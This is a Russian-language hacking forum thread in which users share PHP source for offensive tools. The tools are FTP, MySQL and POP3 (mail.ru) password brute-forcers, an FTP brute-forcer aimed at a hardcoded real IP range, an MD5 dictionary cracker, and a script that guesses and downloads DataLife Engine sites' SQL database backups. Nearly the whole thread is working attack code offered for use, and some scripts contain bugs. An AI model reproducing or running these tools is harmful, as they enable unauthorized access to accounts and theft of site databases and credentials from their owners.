Наши Бруты на PHP (разные)

FreeWolf

Старейшина
Репутация
115 / 396
Ftp brute
<div class='codetop'>CODE</div><div class='codemain' style='height:200px;white-space:pre;overflow:auto'><?php
set_time_limit(0);

$host = "host.ru"; // указываем хост
$port = 21; // указываем порт

$uid_file = file("login.txt"); // файл с именами
$pwd_file = file("passw.txt"); // файл с паролями

$brute_save = fopen("brute_save_ftp.txt","a+"); // сюда пишем удачно сбрутенные аккаунты

$yes_connect = 0;
$no_connect = 0;

if($conn = @ftp_connect($host, $port)) {
for($i=0; $i<count($uid_file); $i++) {
$login = trim($uid_file[$i]);
for($j=0; $j<count($pwd_file); $j++) {
$passwd = trim($pwd_file[$j]);
if($ftp_conn = @ftp_login($conn, $login, $passwd)) {
fputs($brute_save, date("d.m.y H:i:s")."|HOST: ".$host."|Login: ".$login."|Password: ".$passwd."\r\n");
ftp_quit($conn);
$yes_connect++;
}
else {
$no_connect++;
continue;
}
}
}
}
else {
echo "<font face=Tahoma color=#444444 size=2>Не удалось установить связь с $host</font>
";
exit();
}

echo "<font face=Tahoma color=#444444 size=2>Удачных подключений: $yes_connect</font>
";
echo "<font face=Tahoma color=red size=2>Неудачных попыток: $no_connect</font>
";

$show_brute = file("brute_save_ftp.txt");
for($i=0; $i<count($show_brute); $i++) {
list($dates, $host, $login, $passwd) = explode("|", $show_brute[$i]);
echo "<font face=Tahoma color=#runthes size=2>[".$dates."][".$host."][".$login."][".$passwd."]</font>
";
}
?></div>

SQL Brute
<div class='codetop'>CODE</div><div class='codemain' style='height:200px;white-space:pre;overflow:auto'><?php

$host = "localhost"; // указываем хост на котором стоит мускуль
$port = "3306"; // указываем порт мускуля

$uid_file = file("login.txt"); // файл с именами
$pwd_file = file("passw.txt"); // файл с паролями

$brute_save = fopen("brute_save.txt","a+"); // сюда пишем удачно сбрутенные аккаунты

$yes_connect = 0;
$no_connect = 0;

for($i=0; $i<count($uid_file); $i++) {
$login = trim($uid_file[$i]);
for($j=0; $j<count($pwd_file); $j++) {
$passwd = trim($pwd_file[$j]);
if($conn = @mysql_connect($host.":".$port, $login, $passwd)) {
flock($brute_save, 3);
fputs($brute_save, date("d.m.y H:i:s")."|HOST: ".$host."|Login: ".$login."|Password: ".$passwd."\r\n");
flock($brute_save, 1);
mysql_close($conn);
$yes_connect++;
}
else {
$no_connect++;
continue;
}
}
}

echo "<font face=Tahoma color=#444444 size=2>Удачных подключений: $yes_connect</font>
";
echo "<font face=Tahoma color=red size=2>Неудачных попыток: $no_connect</font>
";

$show_brute = file("brute_save.txt");
for($i=0; $i<count($show_brute); $i++) {
list($dates, $host, $login, $passwd) = explode("|", $show_brute[$i]);
echo "<font face=Tahoma color=#runthes size=2>[".$dates."][".$host."][".$login."][".$passwd."]</font>
";
}

?></div>

Mail Brute
brute_mail.php

<div class='codetop'>CODE</div><div class='codemain' style='height:200px;white-space:pre;overflow:auto'><?php
set_time_limit(0);

$user_login = file("user_mail.txt");
$uesr_passwd = file("user_passwd.txt");
$apop = 0;

include_once("./pop3.php");

for($i=0; $i<count($user_login); $i++) {
$u_login = trim($user_login[$i]);
for($j=0; $j<count($user_passwd); $j++) {
$u_passwd = trim($user_passwd[$j]);
$pop3_connection = new pop3_class;
$pop3_connection->hostname = "pop3.mail.ru";
if($pop3_connection->Open()) {
if($pop3_connection->Login($u_login, $u_passwd, $apop)) {
echo "Congritulation!";
$pop3_connection->Close();
}
else {
echo "SHIT";
}
}
else {
echo "Failed!";
exit();
}
}
}

?></div>

pop3.php
<div class='codetop'>CODE</div><div class='codemain' style='height:200px;white-space:pre;overflow:auto'><?
class pop3_class
{
var $hostname="";
var $port=110;

var $connection=0;
var $state="DISCONNECTED";
var $greeting="";
var $must_update=0;

Function GetLine()
{
for($line="";
{
if(feof($this->connection))
return(0);
$line.=fgets($this->connection,100);
$length=strlen($line);
if($length>=2
&& substr($line,$length-2,2)=="\r\n")
return(substr($line,0,$length-2));
}
}

Function PutLine($line)
{
return(fputs($this->connection,"$line\r\n"));
}

Function OpenConnection()
{
if($this->hostname=="")
return("2 it was not specified a valid hostname");
switch(($this->connection=fsockopen($this->hostname,$this->port)))
{
case -3:
return("-3 socket could not be created");
case -4:
return("-4 dns lookup on hostname \"$hostname\" failed");

case -5:
return("-5 connection refused or timed out");
case -6:
return("-6 fdopen() call failed");
case -7:
return("-7 setvbuf() call failed");
default:
return("");
}
}

Function CloseConnection()
{
if($this->connection!=0)
{
fclose($this->connection);
$this->connection=0;
}
}

Function Open()
{
if($this->state!="DISCONNECTED")
return("1 a connection is already opened");
if(($error=$this->OpenConnection())!="")
return($error);
$this->greeting=$this->GetLine();
if(GetType($this->greeting)!="string"
|| strtok($this->greeting," ")!="+OK")
{
$this->CloseConnection();
return("3 POP3 server greeting was not found");
}
$this->greeting=strtok("\r\n");
$this->must_update=0;
$this->state="AUTHORIZATION";
return("");
}
Function Close()
{
if($this->state=="DISCONNECTED")
return("no connection was opened");
if($this->must_update)
{
if($this->PutLine("QUIT")==0)
return("Could not send the QUIT command");
$response=$this->GetLine();
if(GetType($response)!="string")
return("Could not get quit command response");
if(strtok($response," ")!="+OK")
return("Could not quit the connection: ".strtok("\r\n"));
}
$this->CloseConnection();
$this->state="DISCONNECTED";
return("");
}

Function Login($user,$password,$apop)
{
if($this->state!="AUTHORIZATION")
return("connection is not in AUTHORIZATION state");
if($apop)
{
if($this->PutLine("APOP $user ".md5($this->greeting.$password))==0)
return("Could not send the APOP command");
$response=$this->GetLine();
if(GetType($response)!="string")
return("Could not get APOP login command response");
if(strtok($response," ")!="+OK")
return("APOP login failed: ".strtok("\r\n"));
}
else
{
if($this->PutLine("USER $user")==0)
return("Could not send the USER command");
$response=$this->GetLine();
if(GetType($response)!="string")
return("Could not get user login entry response");
if(strtok($response," ")!="+OK")
return("User error: ".strtok("\r\n"));
if($this->PutLine("PASS $password")==0)
return("Could not send the PASS command");
$response=$this->GetLine();
if(GetType($response)!="string")
return("Could not get login password entry response");
if(strtok($response," ")!="+OK")
return("Password error: ".strtok("\r\n"));
}
$this->state="TRANSACTION";
return("");
}
Function Statistics($messages,$size)
{
if($this->state!="TRANSACTION")
return("connection is not in TRANSACTION state");
if($this->PutLine("STAT")==0)
return("Could not send the STAT command");
$response=$this->GetLine();
if(GetType($response)!="string")
return("Could not get the statistics command response");
if(strtok($response," ")!="+OK")
return("Could not get the statistics: ".strtok("\r\n"));
$messages=strtok(" ");
$size=strtok(" ");
return("");
}
Function ListMessages($message,$unique_id)
{
if($this->state!="TRANSACTION")
return("connection is not in TRANSACTION state");
if($unique_id)
$list_command="UIDL";
else
$list_command="LIST";
if($this->PutLine("$list_command $message")==0)
return("Could not send the $list_command command");
$response=$this->GetLine();
if(GetType($response)!="string")
return("Could not get message list command response");
if(strtok($response," ")!="+OK")
return("Could not get the message listing: ".strtok("\r\n"));
if($message=="")
{
for($messages=array();
{
$response=$this->GetLine();
if(GetType($response)!="string")
return("Could not get message list response");
if($response==".")
break;
$message=intval(strtok($response," "));
if($unique_id)
$messages[$message]=strtok(" ");
else
$messages[$message]=intval(strtok(" "));
}
return($messages);
}
else
{
$message=intval(strtok(" "));
return(intval(strtok(" ")));
}
}

Function RetrieveMessage($message,$headers,$body,$lines)
{
if($this->state!="TRANSACTION")
return("connection is not in TRANSACTION state");
if($lines<0)
{
$command="RETR";
$arguments="$message";
}
else
{
$command="TOP";
$arguments="$message $lines";
}
if($this->PutLine("$command $arguments")==0)
return("Could not send the $command command");
$response=$this->GetLine();
if(GetType($response)!="string")
return("Could not get message retrieval command response");
if(strtok($response," ")!="+OK")
return("Could not retrieve the message: ".strtok("\r\n"));
for($headers=$body=array(),$line=0;;$line++)
{
$response=$this->GetLine();
if(GetType($response)!="string")
return("Could not retrieve the message");
switch($response)
{
case ".":
return("");
case "":
break 2;
default:
if(substr($response,0,1)==".")
$response=substr($response,1,strlen($response)-1);
break;
}
$headers[$line]=$response;
}
for($line=0;;$line++)
{
$response=$this->GetLine();
if(GetType($response)!="string")
return("Could not retrieve the message");
switch($response)
{
case ".":
return("");
default:
if(substr($response,0,1)==".")
$response=substr($response,1,strlen($response)-1);
break;
}
$body[$line]=$response;
}
return("");
}

Function DeleteMessage($message)
{
if($this->state!="TRANSACTION")
return("connection is not in TRANSACTION state");
if($this->PutLine("DELE $message")==0)
return("Could not send the DELE command");
$response=$this->GetLine();
if(GetType($response)!="string")
return("Could not get message delete command response");
if(strtok($response," ")!="+OK")
return("Could not delete the message: ".strtok("\r\n"));
$this->must_update=1;
return("");
}

Function ResetDeletedMessages()
{
if($this->state!="TRANSACTION")
return("connection is not in TRANSACTION state");
if($this->PutLine("RSET")==0)
return("Could not send the RSET command");
$response=$this->GetLine();
if(GetType($response)!="string")
return("Could not get reset deleted messages command response");
if(strtok($response," ")!="+OK")
return("Could not reset deleted messages: ".strtok("\r\n"));
$this->must_update=0;
return("");
}
Function IssueNOOP()
{
if($this->state!="TRANSACTION")
return("connection is not in TRANSACTION state");
if($this->PutLine("NOOP")==0)
return("Could not send the NOOP command");
$response=$this->GetLine();
if(GetType($response)!="string")
return("Could not NOOP command response");
if(strtok($response," ")!="+OK")
return("Could not issue the NOOP command: ".strtok("\r\n"));
return("");
}
};</div>

FTP brute2
<div class='codetop'>CODE</div><div class='codemain' style='height:200px;white-space:pre;overflow:auto'><?
ignore_user_abort(1);
set_time_limit(0);

$fd = fopen("./ftp_users.txt", "r");
$fl = fopen("./ftp_dict.txt", "r");
$fr = fopen("./ftp_log.txt", "a");
$i=206;
while($i<214){
$host = "202.6.141.$i";
while(!feof($fd)){
$user = fgets($fd);
while(!feof($fl)){
$pass = fgets($fl);
$connect = ftp_connect($host);
if(!$connect){
fputs($fr, "Enable connect to $host\n");
break;
}else{
$auth = ftp_login($connect, $user, $pass);
if(!$auth){
fputs($fr, "$host:$user:$pass - incorrect\n");
ftp_quit($connect);
}else{
fputs($fr, "$host:$user:$pass - CORRECT\n");
ftp_quit($connect);
}
}
}
}
$i++;
}
fclose($fl);
fclose($fd);
fputs($fr, "Done:\n");
fclose($fr);
?></div>

md5 bruter
<div class='codetop'>CODE</div><div class='codemain' style='height:200px;white-space:pre;overflow:auto'><?
ignore_user_abort(1);
set_time_limit(0);

$fd = fopen("./dict.txt", "r");
$fl = fopen("./log.txt", "a");
$fs = fopen("./hashs.txt", "r");
fls = fopen("./stat.txt", "w");
$count = 0;
if(!$fd){
return "Fill 'dictionary_file' field!";
}elseif(!$fl){
return "Fill 'log_file' field!";
}elseif(!$fs){
return "Fill 'hashs_file' field!";
}else{
while(!$feof($fd)){
$pass = fgets($fd);
$brute_hash = md5($pass);
while(!$feof($fs)){
$hash = fgets($fs);
if($brute_hash == $hash){
fputs($fl, "$hash:$pass\n---\n");
}
}
$count = $count + 1;
fputs($fls, "$count passwords was bruted...");
}
}
fclose($fd);
fclose($fl);
fclose($fs);
fclose($fls);
?></div>

Наводил порядок на компе, вот нашел, решил выложить. Когдато по всему нету собирал. ICQ бруты не стал выкладывать они не работают
 
DLE BACKUP BRUT v1.0 by ZLoY
Код:
<? 
ini_set("max_execution_time", 0); 
?> 
<html> 
<head> 
<title>DLE BACKUP BRUT v1.0 by ZLoY</title> 
</head> 
<body> 
<center /> 
<div style="text-align:center;border:1px solid #000"> 
<h1><font color="">DLE BACKUP BRUT v1.0 by </font>ZLoY</h1> 
</div> 

 

 
<div style="text-align:center;border:1px solid #000"> 
<form method="post"> 
[b]Адрес сайта:[/b] http://<input type="text" name="url" />
 
[b]Название базы:[/b] <input type="text" name="db" />
 
[b]От скольки дней назад брутить:[/b] <input type="text" name="num" />
 
<input type="submit" name="brut" value="Брутить" /> 
</form> 
</div> 

 
<div style="text-align:center;border:1px solid #000"> 
[b]by [url="http://wfound.ru/"]ZLoY[/url][/b]</div> 
</body> 
</html> 
<? 
if(isset($_POST['brut'])) {  
$url = $_POST['url']; 
$db = $_POST['db']; 
$num = $_POST['num']; 
$dle_host = "http://".$url; 
$dle_backup_dir = "/backup/"; 
$dle_db_name = $db; 
 
$true = fopen($dle_db_name . "_true.txt", "a"); 
fwrite($true, date("d.m.Y H:i:s") . " start\r\n"); 
$i = strtotime("-{$num} DAY");  
for (;;) { 
    if ($i > strtotime("+1 YEAR")) { 
        break; 
    }  
    $url_sql = $dle_host . $dle_backup_dir . $dle_db_name . "_" . date("Y-m-d_H-i", $i) . ".sql"; 
    $url_sql_gz = $dle_host . $dle_backup_dir . $dle_db_name . "_" . date("Y-m-d_H-i", $i) . ".sql.gz"; 
    if (@fopen($url_sql, "r")) { 
        $url_sql_source = file_get_contents($url_sql); 
        $sql_backup = fopen($dle_db_name . "_" . date("Y-m-d_H-i", $i) . ".sql", "w"); 
        fwrite($sql_backup, $url_sql_source); 
        fclose($sql_backup); 
        fwrite($true, $url_sql . "\r\n"); 
        echo $url_sql . " - что-то есть!\r\n"; 
        echo "[b]Я НАШЛА!!![/b]
<script>alert('Я НАШЛА!!!!!!!!!!!')</script>"; 
    } 
    else { 
        echo $url_sql . " - пусто!
\r\n"; 
    } 
    if (@fopen($url_sql_gz, "r")) { 
        $url_sql_gz_source = file_get_contents($url_sql_gz); 
        $sql_gz_backup = fopen($dle_db_name . "_" . date("Y-m-d_H-i", $i) . ".sql.gz", "w"); 
        fwrite($sql_gz_backup, $url_sql_gz_source); 
        fclose($sql_gz_backup); 
        fwrite($true, $url_sql_gz . "\r\n"); 
        echo $url_sql_gz . " - что-то есть!\r\n"; 
        echo "[b]Я НАШЛА!!![/b]
<script>alert('Я НАШЛА!!!!!!!!!!!')</script>"; 
    } 
    else { 
        echo $url_sql_gz . " - пусто!
\r\n"; 
    } 
 
    $i = $i + 60; 
} 
fwrite($true, date("d.m.Y H:i:s") . " end\r\n"); 
fclose($true); 
} 
?>
 

Похожие темы

Сверху